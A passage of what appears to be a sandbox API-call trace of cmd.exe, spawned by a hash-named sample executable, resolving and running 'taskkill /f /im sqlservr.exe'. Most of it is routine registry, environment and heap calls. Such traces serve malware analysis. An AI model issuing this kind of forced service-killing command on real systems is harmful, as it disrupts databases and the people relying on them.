lpcbData=0x19ee80*=0x4) returned 0x0 [0219.295] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0219.295] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0219.295] RegCloseKey (hKey=0x88) returned 0x0 [0219.296] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0219.296] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0219.296] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0219.296] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0219.296] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0219.296] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0219.296] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0219.296] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0219.296] RegCloseKey (hKey=0x88) returned 0x0 [0219.296] time (in: timer=0x0 | out: timer=0x0) returned 0x62344249 [0219.296] srand (_Seed=0x62344249) [0219.296] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlservr.exe \"" [0219.296] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlservr.exe \"" [0219.296] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0219.296] GetProcessHeap () returned 0x4f0000 [0219.296] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x4f9bd8 [0219.296] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f9be0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0219.297] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0219.297] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0219.297] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.297] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0219.297] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0219.297] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0219.297] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0219.297] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0219.297] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0219.297] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0219.297] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0219.297] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0219.297] GetProcessHeap () returned 0x4f0000 [0219.298] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f8788) returned 1 [0219.298] GetEnvironmentStringsW () returned 0x4f7d60* [0219.298] GetProcessHeap () returned 0x4f0000 [0219.298] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa32) returned 0x4fa830 [0219.298] FreeEnvironmentStringsA (penv="A") returned 1 [0219.298] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0219.298] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.298] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0219.298] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0219.299] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0219.299] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0219.299] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0219.299] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0219.299] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0219.299] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0219.299] GetProcessHeap () returned 0x4f0000 [0219.299] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x44) returned 0x4f42e0 [0219.299] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0219.299] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0219.299] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0219.299] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4f4330 [0219.300] FindClose (in: hFindFile=0x4f4330 | out: hFindFile=0x4f4330) returned 1 [0219.300] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x4f4330 [0219.300] FindClose (in: hFindFile=0x4f4330 | out: hFindFile=0x4f4330) returned 1 [0219.300] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0219.300] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4f4330 [0219.300] FindClose (in: hFindFile=0x4f4330 | out: hFindFile=0x4f4330) returned 1 [0219.300] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0219.300] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0219.300] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0219.301] GetProcessHeap () returned 0x4f0000 [0219.301] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fa830) returned 1 [0219.301] GetEnvironmentStringsW () returned 0x4f7d60* [0219.301] GetProcessHeap () returned 0x4f0000 [0219.301] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa76) returned 0x4f9df0 [0219.301] FreeEnvironmentStringsA (penv="=") returned 1 [0219.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0219.301] GetProcessHeap () returned 0x4f0000 [0219.302] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f42e0) returned 1 [0219.302] GetProcessHeap () returned 0x4f0000 [0219.302] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400e) returned 0x4fbcf0 [0219.303] GetProcessHeap () returned 0x4f0000 [0219.303] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4c) returned 0x4f42e0 [0219.303] GetProcessHeap () returned 0x4f0000 [0219.303] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x4ffd08 [0219.303] GetProcessHeap () returned 0x4f0000 [0219.303] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x503d18 [0219.304] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0219.305] GetProcessHeap () returned 0x4f0000 [0219.305] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x418) returned 0x4fa870 [0219.305] SetErrorMode (uMode=0x0) returned 0x8003 [0219.305] SetErrorMode (uMode=0x1) returned 0x0 [0219.305] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x4fa878, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0219.305] SetErrorMode (uMode=0x8003) returned 0x1 [0219.305] GetProcessHeap () returned 0x4f0000 [0219.305] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4fa870, Size=0x7e) returned 0x4fa870 [0219.305] GetProcessHeap () returned 0x4f0000 [0219.305] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4fa870) returned 0x7e [0219.305] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0219.305] GetProcessHeap () returned 0x4f0000 [0219.305] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x62) returned 0x4fa8f8 [0219.306] GetProcessHeap () returned 0x4f0000 [0219.306] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb8) returned 0x4fa968 [0219.306] GetProcessHeap () returned 0x4f0000 [0219.306] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4fa968, Size=0x62) returned 0x4fa968 [0219.306] GetProcessHeap () returned 0x4f0000 [0219.306] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4fa968) returned 0x62 [0219.306] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0219.306] GetProcessHeap () returned 0x4f0000 [0219.306] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe0) returned 0x4fa9d8 [0219.310] GetProcessHeap () returned 0x4f0000 [0219.310] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4fa9d8, Size=0x76) returned 0x4fa9d8 [0219.310] GetProcessHeap () returned 0x4f0000 [0219.310] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4fa9d8) returned 0x76 [0219.310] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.311] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im sqlservr.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0219.311] GetLastError () returned 0x3 [0219.311] GetProcessHeap () returned 0x4f0000 [0219.311] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4ffd08) returned 1 [0219.312] GetProcessHeap () returned 0x4f0000 [0219.312] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x503d18) returned 1 [0219.312] GetProcessHeap () returned 0x4f0000 [0219.313] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fbcf0) returned 1 [0219.313] GetConsoleOutputCP () returned 0x1b5 [0219.315] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0219.315] GetUserDefaultLCID () returned 0x409 [0219.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0219.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0219.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0219.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0219.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0219.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0219.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0219.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0219.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0219.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0219.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0219.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0219.317] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0219.317] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0219.317] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0219.321] GetProcessHeap () returned 0x4f0000 [0219.321] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20c) returned 0x4faa58 [0219.321] GetConsoleTitleW (in: lpConsoleTitle=0x4faa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0219.323] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0219.323] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0219.323] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0219.324] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0219.324] GetProcessHeap () returned 0x4f0000 [0219.324] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x4fbcf0 [0219.324] GetProcessHeap () returned 0x4f0000 [0219.325] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fbcf0) returned 1 [0219.326] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0219.326] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0219.326] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0219.326] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0219.326] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0219.326] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0219.326] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0219.326] GetProcessHeap () returned 0x4f0000 [0219.326] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x4fac70 [0219.326] GetProcessHeap () returned 0x4f0000 [0219.326] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1a) returned 0x4facd0 [0219.327] GetProcessHeap () returned 0x4f0000 [0219.327] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x34) returned 0x4facf8 [0219.329] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0219.330] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0219.330] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0219.330] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0219.330] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0219.330] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0219.330] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0219.330] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0219.330] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0219.330] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0219.331] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0219.331] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0219.331] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0219.331] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0219.331] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0219.331] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0219.331] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0219.331] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0219.331] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0219.331] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0219.331] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0219.331] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0219.331] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0219.331] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0219.331] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0219.331] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0219.331] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0219.331] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0219.331] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0219.331] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0219.331] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0219.331] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0219.331] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0219.331] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0219.331] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0219.332] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0219.332] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0219.332] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0219.332] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0219.332] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0219.332] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0219.332] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0219.332] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0219.332] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0219.332] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0219.332] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0219.332] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0219.332] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0219.332] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0219.332] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0219.332] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0219.332] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0219.332] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0219.332] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0219.332] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0219.332] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0219.332] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0219.332] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0219.332] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0219.332] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0219.332] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0219.332] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0219.332] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0219.332] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0219.333] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0219.333] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0219.333] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0219.333] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0219.333] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0219.333] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0219.333] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0219.333] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0219.333] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0219.333] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0219.333] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0219.333] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0219.333] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0219.333] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0219.333] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0219.333] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0219.333] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0219.333] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0219.333] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0219.333] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0219.333] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0219.333] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0219.333] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0219.333] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0219.334] GetProcessHeap () returned 0x4f0000 [0219.334] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x4fad38 [0219.334] GetProcessHeap () returned 0x4f0000 [0219.334] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x46) returned 0x4faf50 [0219.334] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0219.335] GetProcessHeap () returned 0x4f0000 [0219.335] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x418) returned 0x4f05c8 [0219.335] SetErrorMode (uMode=0x0) returned 0x8003 [0219.335] SetErrorMode (uMode=0x1) returned 0x0 [0219.335] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4f05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0219.335] SetErrorMode (uMode=0x8003) returned 0x1 [0219.335] GetProcessHeap () returned 0x4f0000 [0219.335] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f05c8, Size=0x56) returned 0x4f05c8 [0219.335] GetProcessHeap () returned 0x4f0000 [0219.335] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4f05c8) returned 0x56 [0219.335] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0219.335] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.335] GetProcessHeap () returned 0x4f0000 [0219.335] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x110) returned 0x4fafa0 [0219.335] GetProcessHeap () returned 0x4f0000 [0219.335] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x218) returned 0x4f0628 [0219.342] GetProcessHeap () returned 0x4f0000 [0219.342] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f0628, Size=0x112) returned 0x4f0628 [0219.342] GetProcessHeap () returned 0x4f0000 [0219.342] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4f0628) returned 0x112 [0219.342] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0219.342] GetProcessHeap () returned 0x4f0000 [0219.342] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe0) returned 0x4fb0b8 [0219.344] GetProcessHeap () returned 0x4f0000 [0219.344] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4fb0b8, Size=0x76) returned 0x4fb0b8 [0219.344] GetProcessHeap () returned 0x4f0000 [0219.344] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4fb0b8) returned 0x76 [0219.344] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.344] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0219.344] GetLastError () returned 0x2 [0219.344] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.344] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 